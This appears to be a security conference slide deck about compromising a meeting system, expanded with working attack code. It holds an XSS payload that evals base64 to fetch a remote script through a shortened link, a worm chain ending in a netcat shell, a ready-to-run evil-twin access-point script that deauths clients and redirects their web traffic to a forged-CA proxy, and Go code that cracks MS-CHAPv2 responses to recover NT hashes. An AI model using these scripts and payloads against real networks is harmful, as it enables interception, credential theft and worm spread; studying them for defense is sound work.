2. Overview
• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis : MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack
Note: Some images in this presentation have been taken from the web for illustration.
3. SilverFish Worm
Propagation chain: XSS -> NPAPI plugin -> runtime -> Shell
• XSS: <img src='a' onerror=eval(atob('JC5'))> (the base64 string, truncated on the slide, decodes to $.getScript('https://goo.gl/zByVrM'))
• NPAPI: masterPlugin.updatePlugin("attacker-plugin", success, failure)
• Shell: Netcat shell / ssh daemon / Bonjour
Hatching rate = n^g
  n = average number of endpoints per meeting
  g = generation number
[Figure: infection tree, one level per generation g = 0, 1, 2]
8. Attack Setup
Soft AP
• Put the WNIC in master mode and use the forged CA cert
• Configure the AP SSID as "bjn-int"
• Deauth clients from the real AP
Network
• Set up DNS
• Set up DHCP
Routing
• Redirect port 80/443 packets to the proxy port
• Forward the remaining traffic after NAT
Capture
• Sign intercepted hosts with the same CA cert
• Sniff in the proxy
Note: Chrome uses certificate pinning for *.google.com, so those hosts cannot be intercepted this way.
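The four setup steps above (soft AP, DHCP/DNS, redirect-and-NAT, transparent proxy) as one script. This is an added example, not from the slides or from any tool they reference; the interface names (wlan0, eth0, a monitor-mode mon0), the 10.0.0.0/24 range, the upstream resolver and the proxy port 8080 are assumptions, and the SSID is assumed to be open (the slide does not state the real network's auth mode). The generator functions print the hostapd, dnsmasq and iptables configuration; `run` applies it, and the transparent proxy holding the forged CA is started separately.

```shell
#!/bin/sh
# Evil-twin AP setup (added example). Assumed values below; adjust to the lab.
AP_IF=wlan0        # WNIC put into master (AP) mode by hostapd
UP_IF=eth0         # uplink used for NAT
MON_IF=mon0        # monitor-mode interface used for deauth frames
SSID="bjn-int"     # SSID cloned from the target network
CHANNEL=6
AP_ADDR=10.0.0.1
PROXY_PORT=8080    # transparent proxy (e.g. mitmproxy --mode transparent)
UPSTREAM_DNS=1.1.1.1   # assumed upstream resolver; DNS is answered honestly,
                       # interception happens on the redirected 80/443 flows

# Soft AP: hostapd configuration for an open clone of the target SSID.
hostapd_conf() {
  cat <<EOF
interface=$AP_IF
driver=nl80211
ssid=$SSID
hw_mode=g
channel=$CHANNEL
EOF
}

# Network: dnsmasq serves DHCP (router and DNS = the AP) and forwards DNS.
dnsmasq_conf() {
  cat <<EOF
interface=$AP_IF
bind-interfaces
no-resolv
server=$UPSTREAM_DNS
dhcp-range=10.0.0.10,10.0.0.100,12h
dhcp-option=3,$AP_ADDR
dhcp-option=6,$AP_ADDR
EOF
}

# Routing: web ports go to the proxy, everything else is NATed to the uplink.
redirect_rules() {
  cat <<EOF
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i $AP_IF -p tcp --dport 80 -j REDIRECT --to-ports $PROXY_PORT
iptables -t nat -A PREROUTING -i $AP_IF -p tcp --dport 443 -j REDIRECT --to-ports $PROXY_PORT
iptables -t nat -A POSTROUTING -o $UP_IF -j MASQUERADE
iptables -A FORWARD -i $AP_IF -o $UP_IF -j ACCEPT
iptables -A FORWARD -i $UP_IF -o $AP_IF -m state --state RELATED,ESTABLISHED -j ACCEPT
EOF
}

# Knock clients off the real AP (argument: its BSSID) so they re-associate
# with the clone; uses aireplay-ng from the aircrack-ng suite.
deauth_clients() {
  aireplay-ng --deauth 0 -a "$1" "$MON_IF"
}

run() {
  ip link set "$AP_IF" up
  ip addr add "$AP_ADDR/24" dev "$AP_IF"
  hostapd_conf > /tmp/hostapd.conf
  dnsmasq_conf > /tmp/dnsmasq.conf
  redirect_rules | sh
  hostapd -B /tmp/hostapd.conf
  dnsmasq -C /tmp/dnsmasq.conf
  echo "AP up. Start the transparent proxy with the forged CA on port $PROXY_PORT,"
  echo "then run: deauth_clients <real-AP-BSSID>"
}

if [ "${1:-}" = run ]; then run; fi
```

Hosts that the client pins (the slide's *.google.com note) still fail through the proxy: the REDIRECT rule delivers the TCP flow, but the client rejects the forged chain during the TLS handshake, so those connections show up in the proxy log as handshake failures rather than as captured requests.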
13. Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[0:8]
ChallengeResponse = DES(K1, ChallengeHash) || DES(K2, ChallengeHash) || DES(K3, ChallengeHash)
  where K1 || K2 || K3 = NTHash || 0x00 x 5, i.e. the 16-byte MD4 of the password padded to 21 bytes
Note: Original complexity analysis has been done by Moxie Marlinspike
14. Cryptanalysis of MS-CHAPv2 (cont.)
Key split: 7 byte | 7 byte | 2 byte (+ 5 bytes of zero padding)
• K3 carries only 2 bytes of hash material: 2^16 DES operations recover it from the third block
• K1 and K2 encrypt the same 8-byte ChallengeHash, so a single sweep of the 2^56 DES keyspace checks every candidate against both blocks at once
Complexity = 2^56 (not 2^168 as the 21-byte key length suggests)
time < 24 hrs (with dedicated DES-cracking hardware)
(100% success: the full NTHash is recovered every time, no password guessing involved)
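The response construction and the 2^16 recovery of K3 from slides 13 and 14, as an added Go example (not code from the slides or from any tool they mention). The 16-byte NTHash is taken as a constructed input rather than computed with MD4, since the attack recovers the hash itself rather than the password; the peer/authenticator challenges and the user name are constructed too. The 2^56 sweep over K1/K2 is not run here; CandidateMatches shows the per-candidate check such a sweep performs, which is why one pass covers both keys.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// Constructed sample values (not from a real capture).
var (
	peerChallenge = []byte("PEERCHALLENGE!!!") // 16 bytes
	authChallenge = []byte("AUTHCHALLENGE!!!") // 16 bytes
	userName      = "alice"
	// NTHash = MD4(UTF-16LE(password)); taken as given here (MD4 of "password").
	ntHash, _ = hex.DecodeString("8846f7eaee8fb117ad06bdd830b7586c")
)

// ChallengeHash = SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[0:8]
func ChallengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// expandKey turns a 7-byte (56-bit) key into the 8-byte form DES expects by
// inserting one (ignored) parity bit after every 7 key bits.
func expandKey(k []byte) []byte {
	out := make([]byte, 8)
	out[0] = k[0] >> 1
	out[1] = (k[0]&0x01)<<6 | k[1]>>2
	out[2] = (k[1]&0x03)<<5 | k[2]>>3
	out[3] = (k[2]&0x07)<<4 | k[3]>>4
	out[4] = (k[3]&0x0F)<<3 | k[4]>>5
	out[5] = (k[4]&0x1F)<<2 | k[5]>>6
	out[6] = (k[5]&0x3F)<<1 | k[6]>>7
	out[7] = k[6] & 0x7F
	for i := range out {
		out[i] <<= 1
	}
	return out
}

// desBlock encrypts one 8-byte block under a 7-byte key.
func desBlock(k7, block []byte) []byte {
	c, err := des.NewCipher(expandKey(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ChallengeResponse pads the 16-byte NTHash with 5 zero bytes to 21 bytes,
// splits it into three 7-byte DES keys and encrypts the same ChallengeHash
// under each. K3 therefore contains only 2 bytes of hash material.
func ChallengeResponse(nt, ch []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, nt)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desBlock(padded[i*7:(i+1)*7], ch)...)
	}
	return resp
}

// RecoverK3 brute-forces the last two NTHash bytes: 2^16 DES operations.
func RecoverK3(ch, resp []byte) ([]byte, bool) {
	k := make([]byte, 7) // bytes 2..6 are the known zero padding
	for v := 0; v < 1<<16; v++ {
		k[0], k[1] = byte(v>>8), byte(v)
		if bytes.Equal(desBlock(k, ch), resp[16:24]) {
			return []byte{k[0], k[1]}, true
		}
	}
	return nil, false
}

// CandidateMatches is the check a 2^56 sweep runs per candidate key: K1 and
// K2 encrypt the same plaintext, so one DES operation tests both blocks.
func CandidateMatches(k7, ch, resp []byte) (isK1, isK2 bool) {
	e := desBlock(k7, ch)
	return bytes.Equal(e, resp[0:8]), bytes.Equal(e, resp[8:16])
}

func main() {
	ch := ChallengeHash(peerChallenge, authChallenge, userName)
	resp := ChallengeResponse(ntHash, ch)
	fmt.Printf("ChallengeHash     %x\nChallengeResponse %x\n", ch, resp)
	k3, _ := RecoverK3(ch, resp)
	fmt.Printf("NTHash[14:16] = %x recovered with 2^16 work\n", k3)
	isK1, isK2 := CandidateMatches(ntHash[0:7], ch, resp)
	fmt.Println("true K1 matches block 1 / block 2:", isK1, isK2)
}
```

Once the 2^56 sweep and the 2^16 search have yielded all 16 bytes, the attacker holds the NTHash itself, which is sufficient to authenticate as the user (MS-CHAPv2 never needs the password), which is why the slide counts it as a 100% success rather than a dictionary attack.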